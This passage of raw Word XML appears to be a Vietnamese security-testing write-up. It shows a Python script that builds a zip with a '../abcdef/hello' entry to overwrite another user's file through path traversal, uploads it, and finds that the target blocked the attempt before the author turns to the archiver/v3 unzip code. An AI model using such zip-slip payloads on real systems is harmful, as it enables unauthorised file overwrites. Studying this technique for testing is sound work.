    </w:p>
    <w:p w14:paraId="2F895698" w14:textId="12FCAE6F" w:rsidR="00026C8A" w:rsidRDefault="00CA01B4">
      <w:r>
        <w:t xml:space="preserve">Code </w:t>
      </w:r>
      <w:r w:rsidR="008B6677">
        <w:t xml:space="preserve">python </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tạo 1 file zip </w:t>
      </w:r>
      <w:r w:rsidR="008B6677">
        <w:t>chứa ../ để path traversal:</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107B8" w:rsidRPr="001107B8" w14:paraId="47272188" w14:textId="77777777" w:rsidTr="001107B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BA9A460" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="001107B8">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0613B8E4" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DA8B747" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C8BFE54" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71A8A6B1" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E0FCDC2" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F55763F" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CA648F2" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="524941B5" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F6A95C4" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17007851" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0814756D" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13E97A57" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F0727BB" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="508C1FC0" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AAAFB78" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C7DE196" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04444423" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49F6A3F1" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>import</w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>zipfile</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15FC3B5B" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>import</w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>io</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="087DCDA1" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8"/>
          <w:p w14:paraId="5D465C79" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t># Tên file zip đầu ra</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F5676A1" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve">zip_filename = </w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"payload.zip"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6311F52C" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8"/>
          <w:p w14:paraId="42F78E66" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t># Tạo file zip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E1EAABC" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>with</w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve"> zipfile.ZipFile(zip_filename, </w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'w'</w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve">) </w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>as</w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve"> zipf:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6988B34E" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t># Tạo nội dung file</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C539C57" w14:textId="17A32F0A" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve">    file_content = </w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>b"test</w:t>
            </w:r>
            <w:r w:rsidR="00815830">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> lan 2</w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EA189BF" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="462E63EA" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t># Đường dẫn bên trong file zip (có path traversal)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CBBE7D6" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve">    zip_internal_path = </w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"../abcdef/hello"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FBA0928" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EFE2CA8" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t># Ghi nội dung vào file zip với đường dẫn tùy chỉnh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6803FCCD" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:t xml:space="preserve">    zipf.writestr(zip_internal_path, file_content)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C062128" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8"/>
          <w:p w14:paraId="1232EFD3" w14:textId="77777777" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
            <w:r w:rsidRPr="001107B8">
              <w:t>print(</w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">f"Đã tạo file zip: </w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:t>zip_filename</w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="001107B8">
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="150737C3" w14:textId="77777777" w:rsidR="008B6677" w:rsidRDefault="008B6677"/>
    <w:p w14:paraId="6F351EA4" w14:textId="325DC0A9" w:rsidR="001107B8" w:rsidRPr="001107B8" w:rsidRDefault="001107B8" w:rsidP="001107B8">
      <w:r w:rsidRPr="001107B8">
        <w:t xml:space="preserve">Đường dẫn ../abcdef/hello trong file ZIP có thể gây ra </w:t>
      </w:r>
      <w:r w:rsidRPr="001107B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>path traversal</w:t>
      </w:r>
      <w:r w:rsidRPr="001107B8">
        <w:t xml:space="preserve"> khi được giải nén bởi các chương trình không kiểm tra kỹ đường dẫn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E575CF" w14:textId="4CED7C50" w:rsidR="001107B8" w:rsidRDefault="001107B8" w:rsidP="00183EB3">
      <w:r w:rsidRPr="001107B8">
        <w:t xml:space="preserve">Nếu hệ thống backend không lọc hoặc kiểm tra đường dẫn khi giải nén, file có thể được ghi ra ngoài thư mục dự </w:t>
      </w:r>
      <w:r w:rsidR="00C75CA5">
        <w:t>kiến,</w:t>
      </w:r>
      <w:r w:rsidRPr="001107B8">
        <w:t xml:space="preserve"> đây là kỹ thuật thường dùng trong khai thác CTF hoặc kiểm thử bảo mật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220CCA5B" w14:textId="4974C6B8" w:rsidR="00183EB3" w:rsidRDefault="00183EB3" w:rsidP="00183EB3">
      <w:r>
        <w:t xml:space="preserve">Thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="001E0975">
        <w:t>tạo</w:t>
      </w:r>
      <w:r w:rsidR="00156752">
        <w:t xml:space="preserve"> file zip:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190FAB95" w14:textId="51687201" w:rsidR="00156752" w:rsidRDefault="00A503D6" w:rsidP="00183EB3">
      <w:r w:rsidRPr="00A503D6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EEA602A" wp14:editId="6A7562D4">
            <wp:extent cx="5731510" cy="1085850"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="9951315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1504" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1085850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A8ABAB" w14:textId="077CC1E5" w:rsidR="00C75CA5" w:rsidRDefault="00C75CA5" w:rsidP="00183EB3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Vì mình đang dùng ../ để lùi 1 lần và ghi đè lên file hello của người dùng abcdef</w:t>
      </w:r>
      <w:r w:rsidR="00815830">
        <w:t xml:space="preserve"> nên mình sẽ tạo 1 người dùng mới và gửi file này. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7300CF3C" w14:textId="6AC970A2" w:rsidR="00815830" w:rsidRDefault="00815830" w:rsidP="00183EB3">
      <w:r>
        <w:t xml:space="preserve">Đăng ký và đăng nhập tài </w:t>
      </w:r>
      <w:r w:rsidR="00F61E20">
        <w:t>khoản</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mới:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7920CC1D" w14:textId="67ADC744" w:rsidR="00815830" w:rsidRDefault="00510E30" w:rsidP="00183EB3">
      <w:r w:rsidRPr="00510E30">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10C265CE" wp14:editId="2C629E3B">
            <wp:extent cx="5731510" cy="4181475"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="77516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64" name="Picture 1" descr="A screenshot of a login screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4181475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF7C6CF" w14:textId="724C4375" w:rsidR="00F61E20" w:rsidRDefault="00A12F54" w:rsidP="00183EB3">
      <w:r>
        <w:t xml:space="preserve">Thực hiện upload </w:t>
      </w:r>
      <w:r w:rsidR="001E0975">
        <w:t>file zip đã tạo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30227A57" w14:textId="6B3B771A" w:rsidR="00510E30" w:rsidRDefault="002D02D9" w:rsidP="00183EB3">
      <w:r w:rsidRPr="002D02D9">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63550A2B" wp14:editId="7655F360">
            <wp:extent cx="5731510" cy="3078480"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="1272942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2302" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId23"/>
                    <a:srcRect t="10736" b="4211"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5732310" cy="3078910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C3B924" w14:textId="77777777" w:rsidR="0091015C" w:rsidRDefault="0091015C" w:rsidP="00183EB3"/>
    <w:p w14:paraId="021AFEB8" w14:textId="64413779" w:rsidR="001E0975" w:rsidRDefault="001E0975" w:rsidP="00183EB3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>File zip đã được upload thành công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BE8BC6" w14:textId="1D817AC7" w:rsidR="002D02D9" w:rsidRDefault="002D02D9" w:rsidP="00183EB3">
      <w:r w:rsidRPr="002D02D9">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B4FE509" wp14:editId="54A105D2">
            <wp:extent cx="5731510" cy="934720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="6616829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2900" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="934720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C36201" w14:textId="2EE1443C" w:rsidR="007C75D1" w:rsidRDefault="007C75D1" w:rsidP="00183EB3">
      <w:r>
        <w:t>Kiểm tra file hello trong thư mục /files/abcdef có bị ghi đè không:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D9D00E" w14:textId="590349F3" w:rsidR="007B7841" w:rsidRDefault="007B7841" w:rsidP="00183EB3">
      <w:r w:rsidRPr="007B7841">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E38C1B2" wp14:editId="64F79440">
            <wp:extent cx="5731510" cy="1593215"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="2046130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0347" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1593215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DDEBB5" w14:textId="0FD71331" w:rsidR="000D2D7D" w:rsidRDefault="000D2D7D" w:rsidP="00CA7DCF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kiểm tra và thấy file abcdef không bị ghi </w:t>
      </w:r>
      <w:r w:rsidR="00937C45">
        <w:t xml:space="preserve">đè. </w:t>
      </w:r>
      <w:r w:rsidR="00937C45" w:rsidRPr="00937C45">
        <w:t xml:space="preserve">Việc payload không ghi đè được file cho thấy hệ thống đã triển khai một hoặc nhiều biện pháp bảo </w:t>
      </w:r>
      <w:r w:rsidR="00937C45">
        <w:t xml:space="preserve">vệ. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2E9340" w14:textId="4E2EF2F2" w:rsidR="00937C45" w:rsidRDefault="00937C45" w:rsidP="00CA7DCF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sau đó mình kiểm tra log của </w:t>
      </w:r>
      <w:r w:rsidR="00B4194F">
        <w:t xml:space="preserve">docker và thấy hệ thống đã phát </w:t>
      </w:r>
      <w:r w:rsidR="00B4194F" w:rsidRPr="00B4194F">
        <w:t>hiện và chặn path traversal trong file ZIP</w:t>
      </w:r>
      <w:r w:rsidR="00B4194F">
        <w:t xml:space="preserve"> khi nó được đưa vào trực tiếp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EC42BA" w14:textId="684A7F33" w:rsidR="00FC14B6" w:rsidRDefault="00FC14B6" w:rsidP="00183EB3">
      <w:r w:rsidRPr="00FC14B6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CFEB813" wp14:editId="3F32993A">
            <wp:extent cx="5731510" cy="2507615"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="1476858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8548" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2507615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C554B0B" w14:textId="77777777" w:rsidR="0091015C" w:rsidRDefault="0091015C" w:rsidP="00183EB3"/>
    <w:p w14:paraId="2CB42DB3" w14:textId="77777777" w:rsidR="0091015C" w:rsidRDefault="0091015C" w:rsidP="00183EB3"/>
    <w:p w14:paraId="0C20BAB9" w14:textId="77777777" w:rsidR="0091015C" w:rsidRDefault="0091015C" w:rsidP="00183EB3"/>
    <w:p w14:paraId="6E77CA85" w14:textId="77777777" w:rsidR="0091015C" w:rsidRDefault="0091015C" w:rsidP="00183EB3"/>
    <w:p w14:paraId="382B37A3" w14:textId="77777777" w:rsidR="0091015C" w:rsidRDefault="0091015C" w:rsidP="00183EB3"/>
    <w:p w14:paraId="58293134" w14:textId="77777777" w:rsidR="0091015C" w:rsidRDefault="0091015C" w:rsidP="00183EB3"/>
    <w:p w14:paraId="7941ABA0" w14:textId="77777777" w:rsidR="0091015C" w:rsidRDefault="0091015C" w:rsidP="00183EB3"/>
    <w:p w14:paraId="495B9F3F" w14:textId="3F51763A" w:rsidR="0007566C" w:rsidRDefault="00B4194F" w:rsidP="0091015C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Tiếp đó, mình thực hiện phân tích code và phát hiện code có sử dụng </w:t>
      </w:r>
      <w:r w:rsidR="00CA7DCF" w:rsidRPr="00CA7DCF">
        <w:t xml:space="preserve">thư viện archiver/v3 </w:t>
      </w:r>
      <w:r w:rsidR="00CA7DCF">
        <w:t xml:space="preserve">và </w:t>
      </w:r>
      <w:r w:rsidR="00CA7DCF">
        <w:t xml:space="preserve">sử dụng </w:t>
      </w:r>
      <w:r w:rsidR="00CA7DCF" w:rsidRPr="006C4EED">
        <w:t>Unarchive</w:t>
      </w:r>
      <w:r w:rsidR="00CA7DCF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00662B20" w:rsidRPr="00662B20">
        <w:t xml:space="preserve">để giải nén toàn bộ nội dung file </w:t>
      </w:r>
      <w:r w:rsidR="00504F70">
        <w:t>nén</w:t>
      </w:r>
      <w:r w:rsidR="00662B20" w:rsidRPr="00662B20">
        <w:t xml:space="preserve"> vào thư mục </w:t>
      </w:r>
      <w:r w:rsidR="00662B20">
        <w:t>đích.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610CB070" w14:textId="45985ECB" w:rsidR="006223FE" w:rsidRDefault="006223FE" w:rsidP="00183EB3">
      <w:r w:rsidRPr="006223FE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01796C7D" wp14:editId="65FABF05">
            <wp:extent cx="5731510" cy="4325620"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="794801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01069" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
